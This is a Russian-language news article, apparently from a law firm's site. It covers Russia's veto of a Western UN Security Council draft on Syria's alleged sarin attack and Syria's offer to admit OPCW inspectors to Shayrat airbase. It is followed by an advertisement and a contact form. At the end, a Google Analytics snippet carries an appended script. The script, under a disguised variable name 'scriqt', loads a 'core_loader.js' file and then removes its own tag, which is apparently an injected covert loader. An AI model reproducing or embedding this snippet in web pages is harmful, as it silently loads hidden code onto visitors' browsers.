Власти Сирии заявили о готовности принять экспертов Организации по запрещению химического оружия на авиабазе «Шайрат»

Власти Сирии заявили о готовности принять экспертов Организации по запрещению химического оружия на авиабазе «Шайрат»

Россия воспользовалась правом вето и заблокировала проект резолюции по Сирии в Совбезе ООН. Документ, повторно внесенный Великобританией, США и Францией, мало отличался от предложенного ими на прошлой неделе - те же угрозы в адрес Дамаска ввести санкции и применить силу.

В ответ сирийские власти заявили, что готовы принять специалистов Организации по запрещению химического оружия на авиабазе, с которой, по версии американских спецслужб, была произведена зариновая атака. Оказать содействие в расследовании призвал и Спецпосланник ООН. О необходимости всестороннего изучения проблемы неоднократно говорила и Россия. Нынешний проект постпред нашей страны Владимир Сафронков назвал неприемлемым как с точки зрения международного права, так и здравого смысла.

«Главная проблема была в том, что проект резолюции тройки назначал виновных еще до проведения расследования. Подход, не совместимый со стандартами правосудия. Удар по сирийской авиабазе, который был предпринят еще до проведения международного расследования, был нанесен в нарушение норм международного права и санкции Совета безопасности. Принятие проекта западной тройки фактически означало бы легитимизацию этого деяния. Если наши партнеры считают необходимым принять более глубокую резолюцию по сирийской «химии», то тогда надо начинать коллективную работу, придется согласовывать полноценный документ, в котором мы, естественно, будем закреплять наши оценки, подкрепленные многочисленными фактами применения химического оружия террористами», - заявил Владимир Сафронков.

Несмотря на то, что решение России было очевидным, разработчики резолюции развернули дискуссию, причем, в довольно жестких выражениях. Градус попытались сбить представители Китая. Они предложили разработать новый вариант резолюции, который способствовал бы поиску политического решения конфликта в Сирии.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');